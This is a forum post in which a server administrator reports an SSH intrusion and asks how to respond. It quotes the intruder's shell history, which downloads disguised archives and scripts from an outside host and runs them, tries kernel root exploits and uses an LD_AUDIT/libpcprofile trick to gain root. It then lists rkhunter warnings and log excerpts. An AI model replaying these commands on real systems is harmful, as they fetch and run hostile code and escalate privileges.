I looked at netstat and I noticed that someone besides me is connected to the server by ssh. I looked after this because my user has the only one ssh access. I found this in an ftp user .bash_history file:
w uname -a ls -a sudo su wget qiss.ucoz.de/2010/.jpg wget qiss.ucoz.de/2010.jpg tar xzvf 2010.jpg rm -rf 2010.jpg cd 2010/ ls -a ./2010 ./2010x64 ./2.6.31 uname -a ls -a ./2.6.37-rc2 python rh2010.py cd .. ls -a rm -rf 2010/ ls -a wget qiss.ucoz.de/ubuntu2010_2.jpg tar xzvf ubuntu2010_2.jpg rm -rf ubuntu2010_2.jpg ./ubuntu2010-2 ./ubuntu2010-2 ./ubuntu2010-2 cat /etc/issue umask 0 dpkg -S /lib/libpcprofile.so ls -l /lib/libpcprofile.so LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/cron.d/exploit" ping ping gcc touch a.sh nano a.sh vi a.sh vim wget qiss.ucoz.de/ubuntu10.sh sh ubuntu10.sh nano ubuntu10.sh ls -a rm -rf ubuntu10.sh . .. a.sh .cache ubuntu10.sh ubuntu2010-2 ls -a wget qiss.ucoz.de/ubuntu10.sh sh ubuntu10.sh ls -a rm -rf ubuntu10.sh wget http://download.microsoft.com/download/win2000platform/SP/SP3/NT5/EN-US/W2Ksp3.exe rm -rf W2Ksp3.exe passwd The system is in a jail. Does it matter in the current case? What shall i do?
Thanks for everyone!!
I have done these: - ban the connected ssh host with iptables - stoped the sshd in the jail - saved: bach_history, syslog, dmesg, files in the bash_history's wget lines
I installed rkhunter and unhide as well. I ran "unhide sys" command and it resulted 1 hidden process. Now I'm running rkhunter... OK.
rkhunter -c resulted some warnings:
in the jail: Checking if SSH root access is allowed [ Warning ] Checking for syslog configuration file [ Warning ]
Performing filesystem checks Checking for hidden files and directories [ Warning ]
host system: Performing filesystem checks Checking /dev for suspicious file types [ Warning ] Checking for hidden files and directories [ Warning ]
I found in dmesg and syslog that the hacker tried something to do with irda:
- syslog:
Feb 28 22:48:41 i386 kernel: [4180166.230061] irda_init() Feb 28 22:48:41 i386 kernel: [4180166.230077] NET: Registered protocol family 23 Feb 28 22:48:46 i386 kernel: [4180171.242169] ioctl32(2.6.31:4726): Unknown cmd fd(0) cmd(ffbb382c){t:'8';sz:16315} arg(00000001) on /dev/pts/0 Feb 28 22:49:12 i386 sudo: pam_sm_authenticate: Called Feb 28 22:49:12 i386 sudo: pam_sm_authenticate: username = [i] Feb 28 22:49:12 i386 sudo: pam_sm_authenticate: /home/i is already mounted Feb 28 22:49:33 i386 kernel: [4180218.465341] can: controller area network core (rev 20090105 abi 8) Feb 28 22:49:33 i386 kernel: [4180218.465413] NET: Registered protocol family 29 Feb 28 22:49:33 i386 kernel: [4180218.493398] can: broadcast manager protocol (rev 20090105 t) Feb 28 23:00:49 i386 kernel: [4180894.035222] ip_tables: (C) 2000-2006 Netfilter Core Team Feb 28 23:13:48 i386 sudo: pam_sm_authenticate: Called Feb 28 23:13:48 i386 sudo: pam_sm_authenticate: username = [i] Feb 28 23:13:48 i386 sudo: pam_sm_authenticate: /home/i is already mounted Feb 28 23:17:01 i386 CRON[10126]: (root) CMD ( cd / && run-parts --report /etc/cron.hourly) Feb 28 23:36:29 i386 sudo: pam_sm_authenticate: Called Feb 28 23:36:29 i386 sudo: pam_sm_authenticate: username = [i] Feb 28 23:36:29 i386 sudo: pam_sm_authenticate: /home/i is already mounted - dmesg:
[4180166.230061] irda_init() [4180166.230077] NET: Registered protocol family 23 [4180171.242169] ioctl32(2.6.31:4726): Unknown cmd fd(0) cmd(ffbb382c){t:'8';sz:16315} arg(00000001) on /dev/pts/0 [4180218.465341] can: controller area network core (rev 20090105 abi 8) [4180218.465413] NET: Registered protocol family 29 [4180218.493398] can: broadcast manager protocol (rev 20090105 t) [4180894.035222] ip_tables: (C) 2000-2006 Netfilter Core Team 
